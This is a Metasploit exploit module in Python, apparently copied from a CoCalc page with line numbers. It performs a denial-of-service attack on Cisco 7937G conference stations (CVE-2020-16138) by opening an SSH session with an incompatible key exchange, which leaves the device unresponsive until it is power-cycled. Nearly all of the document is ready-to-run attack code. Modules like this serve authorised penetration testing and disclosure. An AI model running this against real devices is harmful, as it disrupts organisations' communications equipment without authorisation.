CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
#!/usr/bin/env python3
2
# -*- coding: utf-8 -*-
3

4
# standard modules
5
from metasploit import module
6
import logging
7
import string
8
import random
9

10
# extra modules
11
dependency1_missing = False
12
dependency2_missing = False
13
try:
14
    import socket
15
except ImportError:
16
    dependency1_missing = True
17
try:
18
    import paramiko
19
except ImportError:
20
    dependency2_missing = True
21

22

23
metadata = {
24
    'name': 'Cisco 7937G Denial-of-Service Attack',
25
    'description': '''
26
        This module exploits a bug in how the conference station 
27
	handles incoming SSH connections that provide an incompatible 
28
	key exchange. By connecting with an incompatible key exchange, 
29
	the device becomes nonresponsive until it is manually power
30
	cycled.
31
    ''',
32
    'authors': [
33
        'Cody Martin'
34
	# Author Homepage: debifrank.github.io
35
	# Organization: BlackLanternSecurity
36
	# Org. Homepage: BlackLanternSecurity.com
37
    ],
38
    'date': '2020-06-02',
39
    'license': 'GPL_LICENSE',
40
    'references': [
41
        {'type': 'url', 'ref': 'https://blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/'},
42
        {'type': 'cve', 'ref': '2020-16138'}
43
    ],
44
    'type': 'dos',
45
    'options': {
46
        'rhost': {'type': 'address', 
47
		'description': 'Target address', 
48
		'required': True, 
49
		'default': 'None'},
50
        'timeout': {'type': 'int', 
51
		'description': 
52
		'Timeout in seconds', 
53
		'required': True, 
54
		'default': 15}
55
    }
56
}
57

58
# from modules/auxiliary/dos/http/slowloris.py
59
def create_rand_cred(size, seq=string.ascii_uppercase + string.ascii_lowercase):
60
    return ''.join(random.choice(seq) for _ in range(size))
61

62
def run(args):
63
    module.LogHandler.setup(msg_prefix='{} - '.format(args['rhost']))
64
    if dependency1_missing:
65
        logging.error('Python module dependency (socket) is missing, cannot continue')
66
        logging.error('Please execute pip3 install socket.')
67
        return
68
    if dependency2_missing:
69
        logging.error('Python module dependency (paramiko) is missing, cannot continue')
70
        logging.error('Please execute pip3 install paramiko.')
71
        return
72

73
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
74
    sock.settimeout(int(args['timeout']))
75
    try:
76
        sock.connect((args['rhost'], 22))
77
    except OSError:
78
        logging.error("Device doesn't appear to be functioning (already DoS'd?) or SSH is not enabled.")
79
        return
80

81
    transport = paramiko.Transport(sock=sock, disabled_algorithms={"kex": ["diffie-hellman-group-exchange-sha1",
82
                                                                           "diffie-hellman-group14-sha1",
83
                                                                           "diffie-hellman-group1-sha1"]})
84
    ssh_uname = create_rand_cred(random.randint(7, 10))
85
    ssh_pass = create_rand_cred(random.randint(7, 10))
86
    try:
87
        transport.connect(username=ssh_uname, password=ssh_pass)
88
    except (paramiko.ssh_exception.SSHException, OSError, paramiko.SSHException):
89
        logging.info("DoS non-reset attack completed!")
90
        logging.info("Errors are intended.")
91
        logging.info("Device must be power cycled to restore functionality.")
92
        return
93

94
    return
95

96

97
if __name__ == '__main__':
98
    module.run(metadata, run)
99

100